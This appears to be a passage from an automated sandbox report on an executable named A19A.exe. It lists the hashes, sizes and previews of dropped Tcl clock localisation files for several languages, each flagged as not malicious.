                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu8W1Yn1YZ1waUuvVTGiMiLpBgoVTJ01iLTh/w2SJmG5F1svtFmsv5d:46K1y1Mv9GrM9oc/FSJmG5F1KtFmK5d
                                                                                                                                                                                                                                                                                                                                MD5:3B4BEE5DD7441A63A31F89D6DFA059BA
                                                                                                                                                                                                                                                                                                                                SHA1:BEE39E45FA3A76B631B4C2D0F937FF6041E09332
                                                                                                                                                                                                                                                                                                                                SHA-256:CCC2B4738DB16FAFB48BFC77C9E2F8BE17BC19E4140E48B61F3EF1CE7C9F3A8C
                                                                                                                                                                                                                                                                                                                                SHA-512:AEC24C75CB00A506A46CC631A2A804C59FBE4F8EBCB86CBA0F4EE5DF7B7C12ED7D25845150599837B364E40BBFDB68244991ED5AF59C9F7792F8362A1E728883
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset et DAYS_OF_WEEK_ABBREV [list \. "P"\. "E"\. "T"\. "K"\. "N"\. "R"\. "L"]. ::msgcat::mcset et DAYS_OF_WEEK_FULL [list \. "p\u00fchap\u00e4ev"\. "esmasp\u00e4ev"\. "teisip\u00e4ev"\. "kolmap\u00e4ev"\. "neljap\u00e4ev"\. "reede"\. "laup\u00e4ev"]. ::msgcat::mcset et MONTHS_ABBREV [list \. "Jaan"\. "Veebr"\. "M\u00e4rts"\. "Apr"\. "Mai"\. "Juuni"\. "Juuli"\. "Aug"\. "Sept"\. "Okt"\. "Nov"\. "Dets"\. ""]. ::msgcat::mcset et MONTHS_FULL [list \. "Jaanuar"\. "Veebruar"\. "M\u00e4rts"\. "Aprill"\. "Mai"\. "Juuni"\. "Juuli"\. "August"\. "September"\. "Oktoober"\. "November"\. "Detsember"\. ""]. ::msgcat::mcset et
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):985
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.9137059580146376
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu80P6/XTPi6/XTotXSSzTGsy+trjz4HsKI:46qWKWoX75Bb4Mv
                                                                                                                                                                                                                                                                                                                                MD5:E27FEB15A6C300753506FC706955AC90
                                                                                                                                                                                                                                                                                                                                SHA1:FDFAC22CC0839B29799001838765EB4A232FD279
                                                                                                                                                                                                                                                                                                                                SHA-256:7DCC4966A5C13A52B6D1DB62BE200B9B5A1DECBACCFCAF15045DD03A2C3E3FAA
                                                                                                                                                                                                                                                                                                                                SHA-512:C54A0F72BC0DAF6A411466565467A2783690EA19F4D401A5448908944A0A6F3F74A7976FA0F851F15B6A97C6D6A3C41FB8BBC8EA42B5D5E3C17A5C8A37436FC5
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset eu DAYS_OF_WEEK_ABBREV [list \. "igandea"\. "astelehena"\. "asteartea"\. "asteazkena"\. "osteguna"\. "ostirala"\. "larunbata"]. ::msgcat::mcset eu DAYS_OF_WEEK_FULL [list \. "igandea"\. "astelehena"\. "asteartea"\. "asteazkena"\. "osteguna"\. "ostirala"\. "larunbata"]. ::msgcat::mcset eu MONTHS_ABBREV [list \. "urt"\. "ots"\. "mar"\. "api"\. "mai"\. "eka"\. "uzt"\. "abu"\. "ira"\. "urr"\. "aza"\. "abe"\. ""]. ::msgcat::mcset eu MONTHS_FULL [list \. "urtarrila"\. "otsaila"\. "martxoa"\. "apirila"\. "maiatza"\. "ekaina"\. "uztaila"\. "abuztua"\. "iraila"\. "urria"\. "azaroa"\. "abendua"\. ""].}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):287
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.8689948586471825
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSyEtJLlpuoo6dmoszFnJF+l6VALoszw3vG5oszw3v6X5osz++3v/R3v:4EnLzu8gL+l6Vt3vf3v6P3vZf
                                                                                                                                                                                                                                                                                                                                MD5:D20788793E6CC1CD07B3AFD2AA135CB6
                                                                                                                                                                                                                                                                                                                                SHA1:3503FCB9490261BA947E89D5494998CEBB157223
                                                                                                                                                                                                                                                                                                                                SHA-256:935164A2D2D14815906B438562889B31139519B3A8E8DB3D2AC152A77EC591DC
                                                                                                                                                                                                                                                                                                                                SHA-512:F65E7D27BD0A99918D6F21C425238000563C2E3A4162D6806EEAC7C9DCB9798987AFFB8BE01899D577078F6297AF468DBAEBEB6375C09ABF332EB44E328F0E8B
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset eu_ES DATE_FORMAT "%a, %Yeko %bren %da". ::msgcat::mcset eu_ES TIME_FORMAT "%T". ::msgcat::mcset eu_ES TIME_FORMAT_12 "%T". ::msgcat::mcset eu_ES DATE_TIME_FORMAT "%y-%m-%d %T %z".}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1664
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.1508548760580295
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu8BMnqZEjgYDT0/y3xg2LSREyqyxDfsycNp/Tpn29Ey5ykDDzi:46cGTYDT0/ya4KIySNnCz2
                                                                                                                                                                                                                                                                                                                                MD5:7E74DE42FBDA63663B58B2E58CF30549
                                                                                                                                                                                                                                                                                                                                SHA1:CB210740F56208E8E621A45D545D7DEFCAE8BCAF
                                                                                                                                                                                                                                                                                                                                SHA-256:F9CA4819E8C8B044D7D68C97FC67E0F4CCD6245E30024161DAB24D0F7C3A9683
                                                                                                                                                                                                                                                                                                                                SHA-512:A03688894BD44B6AB87DC6CAB0A5EC348C9117697A2F9D00E27E850F23EFDC2ADBD53CAC6B9ED33756D3A87C9211B6EE8DF06020F6DA477B9948F52E96071F76
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset fa DAYS_OF_WEEK_ABBREV [list \. "\u06cc\u2214"\. "\u062f\u2214"\. "\u0633\u2214"\. "\u0686\u2214"\. "\u067e\u2214"\. "\u062c\u2214"\. "\u0634\u2214"]. ::msgcat::mcset fa DAYS_OF_WEEK_FULL [list \. "\u06cc\u06cc\u200c\u0634\u0646\u0628\u0647"\. "\u062f\u0648\u0634\u0646\u0628\u0647"\. "\u0633\u0647\u200c\u0634\u0646\u0628\u0647"\. "\u0686\u0647\u0627\u0631\u0634\u0646\u0628\u0647"\. "\u067e\u0646\u062c\u200c\u0634\u0646\u0628\u0647"\. "\u062c\u0645\u0639\u0647"\. "\u0634\u0646\u0628\u0647"]. ::msgcat::mcset fa MONTHS_ABBREV [list \. "\u0698\u0627\u0646"\. "\u0641\u0648\u0631"\. "\u0645\u0627\u0631"\. "\u0622\u0648\u0631"\. "\u0645\u0640\u0647"\. "\u0698\u0648\u0646"\. "\u0698\u0648\u06cc"\. "\u0627\u0648\u062a"\. "\u0633\u067e\u
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1957
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.433104256056609
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu8XMnSZEjgYDT0g3xg2LSREyqyxDf5cNp/Tpn29Ey5ykDDzJ6v3Nev0Nv0f:46OeTYDT0ga4K9SNnCz0v9o0JI
                                                                                                                                                                                                                                                                                                                                MD5:E6DBD1544A69BFC653865B723395E79C
                                                                                                                                                                                                                                                                                                                                SHA1:5E4178E7282807476BD0D6E1F2E320E42FA0DE77
                                                                                                                                                                                                                                                                                                                                SHA-256:6360CE0F31EE593E311B275F3C1F1ED427E237F31010A4280EF2C58AA6F2633A
                                                                                                                                                                                                                                                                                                                                SHA-512:8D77DCB4333F043502CED7277AEEB0453A2C019E1A46826A0FE90F0C480A530F5646A4F76ECC1C15825601FC8B646ED7C78E53996E2908B341BA4ED1392B95F0
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset fa_IN DAYS_OF_WEEK_ABBREV [list \. "\u06cc\u2214"\. "\u062f\u2214"\. "\u0633\u2214"\. "\u0686\u2214"\. "\u067e\u2214"\. "\u062c\u2214"\. "\u0634\u2214"]. ::msgcat::mcset fa_IN DAYS_OF_WEEK_FULL [list \. "\u06cc\u06cc\u200c\u0634\u0646\u0628\u0647"\. "\u062f\u0648\u0634\u0646\u0628\u0647"\. "\u0633\u0647\u200c\u0634\u0646\u0628\u0647"\. "\u0686\u0647\u0627\u0631\u0634\u0646\u0628\u0647"\. "\u067e\u0646\u062c\u200c\u0634\u0646\u0628\u0647"\. "\u062c\u0645\u0639\u0647"\. "\u0634\u0646\u0628\u0647"]. ::msgcat::mcset fa_IN MONTHS_ABBREV [list \. "\u0698\u0627\u0646"\. "\u0641\u0648\u0631"\. "\u0645\u0627\u0631"\. "\u0622\u0648\u0631"\. "\u0645\u0640\u0647"\. "\u0698\u0648\u0646"\. "\u0698\u0648\u06cc"\. "\u0627\u0648\u062a"\. "\u063
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):417
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.087144086729547
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:4EnLzu82vGz7AhF/Q3vf3v6TANv+K3vz7AA7:4azu8vPm/ivfvF9xvP9
                                                                                                                                                                                                                                                                                                                                MD5:044BAAA627AD3C3585D229865A678357
                                                                                                                                                                                                                                                                                                                                SHA1:9D64038C00253A7EEDA4921B9C5E34690E185061
                                                                                                                                                                                                                                                                                                                                SHA-256:CF492CBD73A6C230725225D70566B6E46D5730BD3F63879781DE4433965620BE
                                                                                                                                                                                                                                                                                                                                SHA-512:DA138F242B44111FAFE9EFE986EB987C26A64D9316EA5644AC4D3D4FEC6DF9F5D55F342FC194BC487A1B7C740F931D883A574863B48396D837D1E270B733F735
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset fa_IR AM "\u0635\u0628\u062d". ::msgcat::mcset fa_IR PM "\u0639\u0635\u0631". ::msgcat::mcset fa_IR DATE_FORMAT "%d\u2044%m\u2044%Y". ::msgcat::mcset fa_IR TIME_FORMAT "%S:%M:%H". ::msgcat::mcset fa_IR TIME_FORMAT_12 "%S:%M:%l %P". ::msgcat::mcset fa_IR DATE_TIME_FORMAT "%d\u2044%m\u2044%Y %S:%M:%H %z".}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1145
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.249302428029841
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu8ZeTWSS/DatuUSlWCBTtotL8W183eYKvt3v3eG:46sWp/DatBSPtoNmpMt/J
                                                                                                                                                                                                                                                                                                                                MD5:34FE8E2D987FE534BD88291046F6820B
                                                                                                                                                                                                                                                                                                                                SHA1:B173700C176336BD1B123C2A055A685F73B60C07
                                                                                                                                                                                                                                                                                                                                SHA-256:BE0D2DCE08E6CD786BC3B07A1FB1ADC5B2CF12053C99EACDDAACDDB8802DFB9C
                                                                                                                                                                                                                                                                                                                                SHA-512:4AC513F092D2405FEF6E30C828AE94EDBB4B0B0E1C68C1168EB2498C186DB054EBF697D6B55B49F865A2284F75B7D5490AFE7A80F887AE8312E6F9A5EFE16390
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset fi DAYS_OF_WEEK_ABBREV [list \. "su"\. "ma"\. "ti"\. "ke"\. "to"\. "pe"\. "la"]. ::msgcat::mcset fi DAYS_OF_WEEK_FULL [list \. "sunnuntai"\. "maanantai"\. "tiistai"\. "keskiviikko"\. "torstai"\. "perjantai"\. "lauantai"]. ::msgcat::mcset fi MONTHS_ABBREV [list \. "tammi"\. "helmi"\. "maalis"\. "huhti"\. "touko"\. "kes\u00e4"\. "hein\u00e4"\. "elo"\. "syys"\. "loka"\. "marras"\. "joulu"\. ""]. ::msgcat::mcset fi MONTHS_FULL [list \. "tammikuu"\. "helmikuu"\. "maaliskuu"\. "huhtikuu"\. "toukokuu"\. "kes\u00e4kuu"\. "hein\u00e4kuu"\. "elokuu"\. "syyskuu"\. "lokakuu"\. "marraskuu"\. "joulukuu"\. ""]. ::msgcat
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):986
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.07740021579371
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:4EnLzu87mY5mvAqO6RxmtV5qHbMj6aywE1ZD4ScMfRDc6VZTEpSecbLwJQT1Y4:4azu874/RqEXsSpffTBtbQQT1t
                                                                                                                                                                                                                                                                                                                                MD5:996B699F6821A055B826415446A11C8E
                                                                                                                                                                                                                                                                                                                                SHA1:C382039ED7D2AE8D96CF2EA55FA328AE9CFD2F7D
                                                                                                                                                                                                                                                                                                                                SHA-256:F249DD1698ED1687E13654C04D08B829193027A2FECC24222EC854B59350466A
                                                                                                                                                                                                                                                                                                                                SHA-512:AB6F5ABC9823C7F7A67BA1E821680ACD37761F83CD1F46EC731AB2B72AA34C2E523ACE288E9DE70DB3D58E11F5CB42ECB5A5E4E39BFD7DFD284F1FF6B637E11D
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset fo DAYS_OF_WEEK_ABBREV [list \. "sun"\. "m\u00e1n"\. "t\u00fds"\. "mik"\. "h\u00f3s"\. "fr\u00ed"\. "ley"]. ::msgcat::mcset fo DAYS_OF_WEEK_FULL [list \. "sunnudagur"\. "m\u00e1nadagur"\. "t\u00fdsdagur"\. "mikudagur"\. "h\u00f3sdagur"\. "fr\u00edggjadagur"\. "leygardagur"]. ::msgcat::mcset fo MONTHS_ABBREV [list \. "jan"\. "feb"\. "mar"\. "apr"\. "mai"\. "jun"\. "jul"\. "aug"\. "sep"\. "okt"\. "nov"\. "des"\. ""]. ::msgcat::mcset fo MONTHS_FULL [list \. "januar"\. "februar"\. "mars"\. "apr\u00edl"\. "mai"\. "juni"\. "juli"\. "august"\. "september"\. "oktober"\. "november"\. "desember"\. ""].}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):279
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.816022066048386
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSyEtJLlpuoo6dmoZA4HFLoZd3vG5oZd3v6X5oZd+3vnFDoAov:4EnLzu8kyFO3vf3v6f3v9dy
                                                                                                                                                                                                                                                                                                                                MD5:A76D09A4FA15A2C985CA6BDD22989D6A
                                                                                                                                                                                                                                                                                                                                SHA1:E6105EBCDC547FE2E2FE9EDDC9C573BBDAD85AD0
                                                                                                                                                                                                                                                                                                                                SHA-256:7145B57AC5C074BCA968580B337C04A71BBD6EFB93AFAF291C1361FD700DC791
                                                                                                                                                                                                                                                                                                                                SHA-512:D16542A1CCDC3F5C2A20300B7E38F43F94F7753E0E99F08EB7240D4F286B263815AD481B29F4E96F268E24BA17C5E135E356448685E1BF65B2B63CE6146AA54C
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset fo_FO DATE_FORMAT "%d/%m-%Y". ::msgcat::mcset fo_FO TIME_FORMAT "%T". ::msgcat::mcset fo_FO TIME_FORMAT_12 "%T". ::msgcat::mcset fo_FO DATE_TIME_FORMAT "%a %d %b %Y %T %z".}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1205
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.313638548211754
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu8qW09HSZ2p60wTyVz5bGzJzzTK+VUuG4CNnvxvB:46JYY5moleiUb42vlB
                                                                                                                                                                                                                                                                                                                                MD5:B475F8E7D7065A67E73B1E5CDBF9EB1F
                                                                                                                                                                                                                                                                                                                                SHA1:1B689EDC29F8BC4517936E5D77A084083F12AE31
                                                                                                                                                                                                                                                                                                                                SHA-256:7A87E418B6D8D14D8C11D63708B38D607D28F7DDBF39606C7D8FBA22BE7892CA
                                                                                                                                                                                                                                                                                                                                SHA-512:EA77EFF9B23A02F59526499615C08F1314A91AB41561856ED7DF45930FDD8EC11A105218890FD012045C4CC40621C226F94BDC3BEB62B83EA8FAA7AEC20516E7
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset fr DAYS_OF_WEEK_ABBREV [list \. "dim."\. "lun."\. "mar."\. "mer."\. "jeu."\. "ven."\. "sam."]. ::msgcat::mcset fr DAYS_OF_WEEK_FULL [list \. "dimanche"\. "lundi"\. "mardi"\. "mercredi"\. "jeudi"\. "vendredi"\. "samedi"]. ::msgcat::mcset fr MONTHS_ABBREV [list \. "janv."\. "f\u00e9vr."\. "mars"\. "avr."\. "mai"\. "juin"\. "juil."\. "ao\u00fbt"\. "sept."\. "oct."\. "nov."\. "d\u00e9c."\. ""]. ::msgcat::mcset fr MONTHS_FULL [list \. "janvier"\. "f\u00e9vrier"\. "mars"\. "avril"\. "mai"\. "juin"\. "juillet"\. "ao\u00fbt"\. "septembre"\. "octobre"\. "novembre"\. "d\u00e9cembre"\. ""]. ::msgcat::mcset fr BCE "a
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):279
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.863262857917797
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSyEtJLlpuoo6dmoXqH5oIX3vG5oIX3v6X5og+3vnFDoAov:4EnLzu81qHd3v63v6Y3v9dy
                                                                                                                                                                                                                                                                                                                                MD5:483652B6A3D8010C3CDB6CAD0AD95E72
                                                                                                                                                                                                                                                                                                                                SHA1:8FCDB01D0729E9F1A0CAC56F79EDB79A37734AF5
                                                                                                                                                                                                                                                                                                                                SHA-256:980E703DFB1EEDE7DE48C958F6B501ED4251F69CB0FBCE0FCA85555F5ACF134A
                                                                                                                                                                                                                                                                                                                                SHA-512:0282B8F3884BB4406F69AF2D2F44E431FB8077FEA86D09ED5607BC0932A049853D0C5CAF0B57EF0289F42A8265F76CC4B10111A28B1E0E9BD54E9319B25D8DB6
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset fr_BE DATE_FORMAT "%d/%m/%y". ::msgcat::mcset fr_BE TIME_FORMAT "%T". ::msgcat::mcset fr_BE TIME_FORMAT_12 "%T". ::msgcat::mcset fr_BE DATE_TIME_FORMAT "%a %d %b %Y %T %z".}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):279
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.843031408533295
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSyEtJLlpuoo6dmooI9jo13vG5o13v6X5o1+3vnFDoAov:4EnLzu8eI9Q3vB3v613v9dy
                                                                                                                                                                                                                                                                                                                                MD5:017D816D73DAB852546169F3EC2D16F2
                                                                                                                                                                                                                                                                                                                                SHA1:3145BB54D9E1E4D9166186D5B43F411CE0250594
                                                                                                                                                                                                                                                                                                                                SHA-256:F16E212D5D1F6E83A9FC4E56874E4C7B8F1947EE882610A73199480319EFA529
                                                                                                                                                                                                                                                                                                                                SHA-512:4D4EF395B15F750F16EC64162BE8AB4B082C6CD1877CA63D5EA4A5E940A7F98E46D792115FD105B293DC43714E8662BC4411E14E93F09769A064622E52EDE258
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset fr_CA DATE_FORMAT "%Y-%m-%d". ::msgcat::mcset fr_CA TIME_FORMAT "%T". ::msgcat::mcset fr_CA TIME_FORMAT_12 "%T". ::msgcat::mcset fr_CA DATE_TIME_FORMAT "%a %d %b %Y %T %z".}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):281
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.866549204705568
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSyEtJLlpuoo6dmoFt2poF+3vG5oF+3v6X5o++3vnFDoAov:4EnLzu8btn+3vB+3v6+3v9dy
                                                                                                                                                                                                                                                                                                                                MD5:8B27EFF0D45F536852E7A819500B7F93
                                                                                                                                                                                                                                                                                                                                SHA1:CAED7D4334BAD8BE586A1AEEE270FB6913A03512
                                                                                                                                                                                                                                                                                                                                SHA-256:AB160BFDEB5C3ADF071E01C78312A81EE4223BBF5470AB880972BBF5965291F3
                                                                                                                                                                                                                                                                                                                                SHA-512:52DD94F524C1D9AB13F5933265691E8C44B2946F507DE30D789FDCFEA7839A4076CB55A01CEB49194134D7BC84E4F490341AAB9DFB75BB960B03829D6550872B
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset fr_CH DATE_FORMAT "%d. %m. %y". ::msgcat::mcset fr_CH TIME_FORMAT "%T". ::msgcat::mcset fr_CH TIME_FORMAT_12 "%T". ::msgcat::mcset fr_CH DATE_TIME_FORMAT "%a %d %b %Y %T %z".}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1141
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.24180563443443
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu8qppr5xqPs5Jpwe3zESbs5JpbxK+dfJ:46ct5XGe3zwXu4fJ
                                                                                                                                                                                                                                                                                                                                MD5:88D5CB026EBC3605E8693D9A82C2D050
                                                                                                                                                                                                                                                                                                                                SHA1:C2A613DC7C367A841D99DE15876F5E7A8027BBF8
                                                                                                                                                                                                                                                                                                                                SHA-256:057C75C1AD70653733DCE43EA5BF151500F39314E8B0236EE80F8D5DB623627F
                                                                                                                                                                                                                                                                                                                                SHA-512:253575BFB722CF06937BBE4E9867704B95EFE7B112B370E1430A2027A1818BD2560562A43AD2D067386787899093B25AE84ABFE813672A15A649FEF487E31F7A
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ga DAYS_OF_WEEK_ABBREV [list \. "Domh"\. "Luan"\. "M\u00e1irt"\. "C\u00e9ad"\. "D\u00e9ar"\. "Aoine"\. "Sath"]. ::msgcat::mcset ga DAYS_OF_WEEK_FULL [list \. "D\u00e9 Domhnaigh"\. "D\u00e9 Luain"\. "D\u00e9 M\u00e1irt"\. "D\u00e9 C\u00e9adaoin"\. "D\u00e9ardaoin"\. "D\u00e9 hAoine"\. "D\u00e9 Sathairn"]. ::msgcat::mcset ga MONTHS_ABBREV [list \. "Ean"\. "Feabh"\. "M\u00e1rta"\. "Aib"\. "Beal"\. "Meith"\. "I\u00fail"\. "L\u00fan"\. "MF\u00f3mh"\. "DF\u00f3mh"\. "Samh"\. "Noll"\. ""]. ::msgcat::mcset ga MONTHS_FULL [list \. "Ean\u00e1ir"\. "Feabhra"\. "M\u00e1rta"\. "Aibre\u00e1n"\. "M\u00ed na Bealtaine"\. "Meith"\. "I\u00fail"\. "L\u00fanasa"
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):279
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.7755422576113595
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSyEtJLlpuoo6dmobHAyg0obHAqo+3vG5obHAqo+3v6X5obHAy9+3vnFDoAov:4EnLzu8s33vj3v6r3v9dy
                                                                                                                                                                                                                                                                                                                                MD5:04452D43DA05A94414973F45CDD12869
                                                                                                                                                                                                                                                                                                                                SHA1:AEEDCC2177B592A0025A1DBCFFC0EF3634DBF562
                                                                                                                                                                                                                                                                                                                                SHA-256:2072E48C98B480DB5677188836485B4605D5A9D99870AC73B5BFE9DCC6DB46F4
                                                                                                                                                                                                                                                                                                                                SHA-512:5A01156FD5AB662EE9D626518B4398A161BAF934E3A618B3A18839A944AEEAEE6FE1A5279D7750511B126DB3AD2CC992CDA067573205ACBC211C34C8A099305F
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ga_IE DATE_FORMAT "%d.%m.%y". ::msgcat::mcset ga_IE TIME_FORMAT "%T". ::msgcat::mcset ga_IE TIME_FORMAT_12 "%T". ::msgcat::mcset ga_IE DATE_TIME_FORMAT "%a %d %b %Y %T %z".}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):950
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.037076523160125
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu8LpP8ihyz/ptFOBViNef9kekIsnyFo0:46J0i0zRtUB0c9dkVneo0
                                                                                                                                                                                                                                                                                                                                MD5:B940E67011DDBAD6192E9182C5F0CCC0
